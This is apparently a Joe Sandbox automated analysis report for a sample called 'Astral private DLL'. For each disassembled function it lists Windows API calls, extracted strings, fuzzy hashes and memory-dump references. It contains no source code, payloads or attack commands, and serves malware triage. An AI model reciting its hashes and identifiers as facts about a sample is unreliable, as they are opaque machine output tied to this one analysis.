                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: fae290566112e2659613aaaae1469b589447a2231d35676c5b0c715b4c2a3ce5
                                                                • Instruction ID: 2c757a11ea8f04c4722f32116e41508cc591ac8536566ca1c829a30f884d1483
                                                                • Opcode Fuzzy Hash: fae290566112e2659613aaaae1469b589447a2231d35676c5b0c715b4c2a3ce5
                                                                • Instruction Fuzzy Hash: A8316D316007059FEB20BA78D846B5AB7EAEF20350F504529F148D7292DF31EE41CFA0
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 00179736
                                                                • _wcslen.LIBCMT ref: 001797D6
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 001797E5
                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00179806
                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0017982D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                • API String ID: 1777411235-4209811716
                                                                • Opcode ID: 1dd37296436f5d1057366953b62fcc3d32e6079e1be93a7276d147906bb72ad2
                                                                • Instruction ID: c4a93d37ffd7cead6c1758364e1717e9b7c2708f549334992bbb298f1a995c23
                                                                • Opcode Fuzzy Hash: 1dd37296436f5d1057366953b62fcc3d32e6079e1be93a7276d147906bb72ad2
                                                                • Instruction Fuzzy Hash: 453168721083017BEB25BB649C02FAF77A8EF52710F24411EF415961D2EB64DA0987A6
                                                                APIs
                                                                • GetWindow.USER32(?,00000005), ref: 0017D6C1
                                                                • GetClassNameW.USER32(00000000,?,00000800), ref: 0017D6ED
                                                                  • Part of subcall function 00171FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0016C116,00000000,.exe,?,?,00000800,?,?,?,00178E3C), ref: 00171FD1
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0017D709
                                                                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0017D720
                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 0017D734
                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0017D75D
                                                                • DeleteObject.GDI32(00000000), ref: 0017D764
                                                                • GetWindow.USER32(00000000,00000002), ref: 0017D76D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                • String ID: STATIC
                                                                • API String ID: 3820355801-1882779555
                                                                • Opcode ID: ef79747837ca276cccdac8c2e6ba7d8b7719e7ee18aef7d92ef171a5d9157cf2
                                                                • Instruction ID: be33af8d338b7dbf53dc621f61a7f1a82121130ec9aafbc3faf062050d9a8870
                                                                • Opcode Fuzzy Hash: ef79747837ca276cccdac8c2e6ba7d8b7719e7ee18aef7d92ef171a5d9157cf2
                                                                • Instruction Fuzzy Hash: 3A1121321803147FE6216B70AC4AFAF7A7CAF54B45F00C120FA69A2091DB64CA8542A6
                                                                APIs
                                                                • _free.LIBCMT ref: 00189705
                                                                  • Part of subcall function 00188DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0018C896,?,00000000,?,00000000,?,0018C8BD,?,00000007,?,?,0018CCBA,?), ref: 00188DE2
                                                                  • Part of subcall function 00188DCC: GetLastError.KERNEL32(?,?,0018C896,?,00000000,?,00000000,?,0018C8BD,?,00000007,?,?,0018CCBA,?,?), ref: 00188DF4
                                                                • _free.LIBCMT ref: 00189711
                                                                • _free.LIBCMT ref: 0018971C
                                                                • _free.LIBCMT ref: 00189727
                                                                • _free.LIBCMT ref: 00189732
                                                                • _free.LIBCMT ref: 0018973D
                                                                • _free.LIBCMT ref: 00189748
                                                                • _free.LIBCMT ref: 00189753
                                                                • _free.LIBCMT ref: 0018975E
                                                                • _free.LIBCMT ref: 0018976C
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 5e888fcaf9545ec553f5f594f81c4d2309ed225e326a85e7fc064b36d28862f5
                                                                • Instruction ID: 7d0b9092fbeb26747e4fb4b4b8c5c3a4e9844ce84ef8bb98ccc29009cd2c8bf7
                                                                • Opcode Fuzzy Hash: 5e888fcaf9545ec553f5f594f81c4d2309ed225e326a85e7fc064b36d28862f5
                                                                • Instruction Fuzzy Hash: AE116076510109AFCB01FF94C982CD93BB6EF24350B9556A5FA088F262DF32EB519F84
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 322700389-393685449
                                                                • Opcode ID: 9a4e64050e23199ce5a7c2a03c84b9a5ccacfeb8977bb9bfe4d8602f2c6fe476
                                                                • Instruction ID: de91a49b4dd81fa329e6b0a1ba01f6f6dea8a2cf8058855fe3a04783a5f8d0fe
                                                                • Opcode Fuzzy Hash: 9a4e64050e23199ce5a7c2a03c84b9a5ccacfeb8977bb9bfe4d8602f2c6fe476
                                                                • Instruction Fuzzy Hash: 0FB14871900209EFCF2AFFA4C8859AEBBB5BF14B10B18415AF8256B212D735DB51CF91
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00166FAA
                                                                • _wcslen.LIBCMT ref: 00167013
                                                                • _wcslen.LIBCMT ref: 00167084
                                                                  • Part of subcall function 00167A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00167AAB
                                                                  • Part of subcall function 00167A9C: GetLastError.KERNEL32 ref: 00167AF1
                                                                  • Part of subcall function 00167A9C: CloseHandle.KERNEL32(?), ref: 00167B00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                • API String ID: 3122303884-3508440684
                                                                • Opcode ID: 5e411b21316e51e8390baa1aa6ac760052b89abcf9daa9944cceeff94a0c3033
                                                                • Instruction ID: 83a05bbed2a58ca98bb997bb203ffddad59936ee55a68c6a3be6e24a1987b90f
                                                                • Opcode Fuzzy Hash: 5e411b21316e51e8390baa1aa6ac760052b89abcf9daa9944cceeff94a0c3033
                                                                • Instruction Fuzzy Hash: FA41E7B1D08344BAEF21E7709D42FEE776C9F25308F044456FA55A71C2D774AA948B21
                                                                APIs
                                                                  • Part of subcall function 00161316: GetDlgItem.USER32(00000000,00003021), ref: 0016135A
                                                                  • Part of subcall function 00161316: SetWindowTextW.USER32(00000000,001935F4), ref: 00161370
                                                                • EndDialog.USER32(?,00000001), ref: 0017B610
                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 0017B637
                                                                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0017B650
                                                                • SetWindowTextW.USER32(?,?), ref: 0017B661
                                                                • GetDlgItem.USER32(?,00000065), ref: 0017B66A
                                                                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0017B67E
                                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0017B694
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Item$TextWindow$Dialog
                                                                • String ID: LICENSEDLG
                                                                • API String ID: 3214253823-2177901306
                                                                • Opcode ID: aaf3417835d3534e4e5ab1feb6f2882e57daae0f74c1f8d14d1aee8bc4a2a754
                                                                • Instruction ID: de06249452f46dd201495917b8c143846a7d227e6eaadd350e76e64ce9beb51a
                                                                • Opcode Fuzzy Hash: aaf3417835d3534e4e5ab1feb6f2882e57daae0f74c1f8d14d1aee8bc4a2a754
                                                                • Instruction Fuzzy Hash: 4C21D332208204BBD6115F65EC8AF7B3F7DEB4AB81F05C018F709A28A0CB52D9819635
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,C3619272,00000001,00000000,00000000,?,?,0016AF6C,ROOT\CIMV2), ref: 0017FD99
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0016AF6C,ROOT\CIMV2), ref: 0017FE14
                                                                • SysAllocString.OLEAUT32(00000000), ref: 0017FE1F
                                                                • _com_issue_error.COMSUPP ref: 0017FE48
                                                                • _com_issue_error.COMSUPP ref: 0017FE52
                                                                • GetLastError.KERNEL32(80070057,C3619272,00000001,00000000,00000000,?,?,0016AF6C,ROOT\CIMV2), ref: 0017FE57
                                                                • _com_issue_error.COMSUPP ref: 0017FE6A
                                                                • GetLastError.KERNEL32(00000000,?,?,0016AF6C,ROOT\CIMV2), ref: 0017FE80
                                                                • _com_issue_error.COMSUPP ref: 0017FE93
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                • String ID:
                                                                • API String ID: 1353541977-0
                                                                • Opcode ID: 85c5d51018fd6755728b0f915612fc76156e44b9ead174e70d2b219098868c19
                                                                • Instruction ID: 45281ca2f92cf49992be0861d858e8682a3979f6a37f36e676a48b74d5a32af2
                                                                • Opcode Fuzzy Hash: 85c5d51018fd6755728b0f915612fc76156e44b9ead174e70d2b219098868c19
                                                                • Instruction Fuzzy Hash: 2B41CA71A00215ABDB109FA4CC45BAFBBB8EB44710F15823EF919E7251DB349941CBA5
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                • API String ID: 3519838083-3505469590
                                                                • Opcode ID: 7fb7b6d894f7fe553319830e0278cf5e0afdd2163e3703540f5448dd43cc58d1
                                                                • Instruction ID: da70e90608bbf0f2937dfd862c4729ecff11cb9a311a4366ca25c4d458264089
                                                                • Opcode Fuzzy Hash: 7fb7b6d894f7fe553319830e0278cf5e0afdd2163e3703540f5448dd43cc58d1
                                                                • Instruction Fuzzy Hash: E1713A71A00219AFDF14DFA8CC959AEBBB9FF48710B140159F516E72A0CB30AE81CB60
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00169387
                                                                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 001693AA
                                                                • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 001693C9
                                                                  • Part of subcall function 0016C29A: _wcslen.LIBCMT ref: 0016C2A2
                                                                  • Part of subcall function 00171FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0016C116,00000000,.exe,?,?,00000800,?,?,?,00178E3C), ref: 00171FD1
                                                                • _swprintf.LIBCMT ref: 00169465
                                                                  • Part of subcall function 00164092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001640A5
                                                                • MoveFileW.KERNEL32(?,?), ref: 001694D4
                                                                • MoveFileW.KERNEL32(?,?), ref: 00169514
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                • String ID: rtmp%d
                                                                • API String ID: 3726343395-3303766350
                                                                • Opcode ID: 9e5f1399a3e14c902e7c5712eadac5e2962dacb35fb59615a735635e4142986c
                                                                • Instruction ID: 559704ed027a90862a755d1170ba7749cd32aa527868d5250a38beecb93181a9
                                                                • Opcode Fuzzy Hash: 9e5f1399a3e14c902e7c5712eadac5e2962dacb35fb59615a735635e4142986c
                                                                • Instruction Fuzzy Hash: 73414571901258A7DF21EBA0CD55EEE737CAF55740F0488A6B64AE3051EB388BD9CB60
                                                                APIs
                                                                • __aulldiv.LIBCMT ref: 0017122E
                                                                  • Part of subcall function 0016B146: GetVersionExW.KERNEL32(?), ref: 0016B16B
                                                                • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00171251
                                                                • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00171263
                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00171274
                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00171284
                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00171294
                                                                • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 001712CF
                                                                • __aullrem.LIBCMT ref: 00171379
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                • String ID:
                                                                • API String ID: 1247370737-0
                                                                • Opcode ID: dd79f50935637e06cd5a3f6b3837f99a4548ab359ff9d3f186e79320e6610444
                                                                • Instruction ID: a3988257403542f06779f354f0f6386a8d5098faa13531a4a782d29b9c513ad1
                                                                • Opcode Fuzzy Hash: dd79f50935637e06cd5a3f6b3837f99a4548ab359ff9d3f186e79320e6610444
                                                                • Instruction Fuzzy Hash: F241F5B6508305AFC710DF69C88496BFBF9FB88314F10892EF59AC2610E734E659CB52
                                                                APIs
                                                                • _swprintf.LIBCMT ref: 00162536
                                                                  • Part of subcall function 00164092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001640A5
                                                                  • Part of subcall function 001705DA: _wcslen.LIBCMT ref: 001705E0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                • String ID: ;%u$x%u$xc%u
                                                                • API String ID: 3053425827-2277559157
                                                                • Opcode ID: 9579055069793c57c235f4de94e1f9b8d6c936725d0a9a1389f755829aeccf29
                                                                • Instruction ID: 9c689f1ca3840091ee0552a9e0f9eb9d77d44c84aa300d8b6d43dc5bb0c37878
                                                                • Opcode Fuzzy Hash: 9579055069793c57c235f4de94e1f9b8d6c936725d0a9a1389f755829aeccf29
                                                                • Instruction Fuzzy Hash: 73F115706047419BDB25DF288C95BFA77D96FA4300F08456DECCA9B283CB748965C7A2
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: </p>$</style>$<br>$<style>$>
                                                                • API String ID: 176396367-3568243669
                                                                • Opcode ID: 2f3fb7f75d614252ff0c464c124f08c5d8081a9dcae68609fd930843fff45d9d
                                                                • Instruction ID: bdf78862edfcce68dab9fda4e8ad413e40287b21a98b414b66017c80eaaee3e8
                                                                • Opcode Fuzzy Hash: 2f3fb7f75d614252ff0c464c124f08c5d8081a9dcae68609fd930843fff45d9d
                                                                • Instruction Fuzzy Hash: F551496674036395DB309AA9DC21B7673F0DFA1750F68C41BF9C98B2C0FF658D898261
                                                                APIs
                                                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0018FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0018F6CF
                                                                • __fassign.LIBCMT ref: 0018F74A
                                                                • __fassign.LIBCMT ref: 0018F765
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0018F78B
                                                                • WriteFile.KERNEL32(?,00000000,00000000,0018FE02,00000000,?,?,?,?,?,?,?,?,?,0018FE02,00000000), ref: 0018F7AA
                                                                • WriteFile.KERNEL32(?,00000000,00000001,0018FE02,00000000,?,?,?,?,?,?,?,?,?,0018FE02,00000000), ref: 0018F7E3
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                • String ID:
                                                                • API String ID: 1324828854-0
                                                                • Opcode ID: dea636ee59ee21204d71fa7efe8b994c22c325a4b0f56d1f0cb4afa039b456a7
                                                                • Instruction ID: f3adecfad76c0d5a86f26a0217ed5fc8a01e68ee352c623563f97f2f66fa42a4
                                                                • Opcode Fuzzy Hash: dea636ee59ee21204d71fa7efe8b994c22c325a4b0f56d1f0cb4afa039b456a7
                                                                • Instruction Fuzzy Hash: 305183B5A002499FDB10DFA8DC85AEEBBF4EF09300F14416EE555E7251D770AA41CFA0
                                                                APIs
                                                                • _ValidateLocalCookies.LIBCMT ref: 00182937
                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0018293F
                                                                • _ValidateLocalCookies.LIBCMT ref: 001829C8
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 001829F3
                                                                • _ValidateLocalCookies.LIBCMT ref: 00182A48
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1759111998.0000000000161000.00000020.00000001.01000000.00000005.sdmp, Offset: 00160000, based on PE: true
                                                                • Associated: 00000001.00000002.1759049408.0000000000160000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.000000000019E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759170784.00000000001C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                • Associated: 00000001.00000002.1759277629.00000000001C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_160000_Astral private DLL.jbxd
                                                                Similarity
                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 1170836740-1018135373
                                                                • Opcode ID: 6521bcf6ee5fbcb50aeb4e8861dbefa9de65479397fdd12e7541708e098fc08d
